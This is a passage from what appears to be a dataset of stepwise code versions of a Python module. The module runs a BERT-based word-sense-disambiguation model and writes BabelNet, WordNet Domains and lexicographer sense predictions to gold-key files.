you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: 
the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. 
Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\ndef __decide_pos(pos: str) ->str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = 'n'\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\n\ndef create_custom_label(list_of_possible_senses: List, word: str, vocab:\n Dict, predictions, enable_coarse_grained: int=1) ->List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param 
predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + '_' + list_of_possible_senses[indice\n ] if enable_coarse_grained == 1 else list_of_possible_senses[indice\n ]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for\n prov_index in range(len(list_of_possible_senses)) if prov_index\n not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. 
DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. 
Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: 
the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. 
Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\ndef __decide_pos(pos: str) ->str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = 'n'\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\n\ndef create_custom_label(list_of_possible_senses: List, word: str, vocab:\n Dict, predictions, enable_coarse_grained: int=1) ->List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param 
predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + '_' + list_of_possible_senses[indice\n ] if enable_coarse_grained == 1 else list_of_possible_senses[indice\n ]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for\n prov_index in range(len(list_of_possible_senses)) if prov_index\n not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\nif __name__ == '__main__':\n predict_babelnet(\n '/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml'\n , '../output',\n '/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources'\n )\n", "step-5": "from model import WSD\nfrom data_preprocessing import load_dataset, create_mapping_dictionary, reload_word_mapping,get_bn2wn,get_bn2wndomains, get_bn2lex\nfrom typing import List, Dict, Tuple\nfrom prova import convert_sentence_to_features_no_padding\nimport numpy as np\nimport os\nfrom nltk.corpus import wordnet\n\n\nmfs_counter = 0\n\n\ndef predict_babelnet(input_path : str, output_path : str, resources_path : str) -> None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. 
Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print(\">>>> BABELNET PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path,resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3]+\"babelnet.gold.key.txt\"\n for index in range(len(prediction_results)):\n\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path, output_path,\n prediction_results[index][0][0],\n vocab=vocab_label_bn,\n enable_coarse_grained=1,\n vocab_for_coarse=None)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path : str, output_path : str, resources_path : str) -> None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. 
Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print(\">>>> WORDNET DOMAINS PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path,resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3]+\"wndomains.gold.key.txt\"\n for index in range(len(prediction_results)):\n\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path, output_path,\n prediction_results[index][1][0],\n vocab=vocab_label_wndmn,\n enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path : str, output_path : str, resources_path : str) -> None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. 
Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print(\">>>> LEXICOGRAPHER PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path, resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + \"lexicon.gold.key.txt\"\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path,output_path,\n prediction_results[index][2][0],\n vocab= vocab_label_lex,\n enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path : str, resources_path : str) -> Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path+\"/vocabularies/bert_vocab.txt\", [len(vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)], dropout=0.1, recurrent_dropout=0.1,learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path+\"/saved_model/model_20_2.14.h5\")\n to_return = []\n sentences_xml_elements = etree_data.xpath(\"/*/*/*\")\n for sentence in train:\n feature_1, feature_2, feature_3 = convert_sentence_to_features_no_padding(sentence,tokenizatore)\n results = modello.model.predict(\n {'input_word_ids': feature_1, 'input_mask': feature_2, 'segment_ids': feature_3},\n verbose=1\n )\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str,\n frase,\n resources_path: str,\n outputh_path: str,\n predictions,\n vocab = None,\n enable_coarse_grained: int = 1,\n vocab_for_coarse = None) -> int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your 
predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path+\"/mapping/lemma2wn.txt\")\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n # MFS\n the_actual_meaning = MFS(parola,\n bn2wn,\n vocab2=vocab_for_coarse,\n pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(list_of_possible_senses_first_step, bn2wn)\n\n candidates,list_of_possible_senses_bn_version = create_custom_label(list_of_possible_senses_bn_version,\n parola.text,\n vocab,\n predictions[index],\n enable_coarse_grained=enable_coarse_grained)\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n #MFS\n mfs_counter += 1\n the_actual_meaning = MFS(parola,\n bn2wn,\n vocab2=vocab_for_coarse,\n pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + \"/\"+filename, \"a\") as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + \" \" + tupla[1]+\"\\n\")\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2:Dict = None, pred_case: int = 1) -> str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a 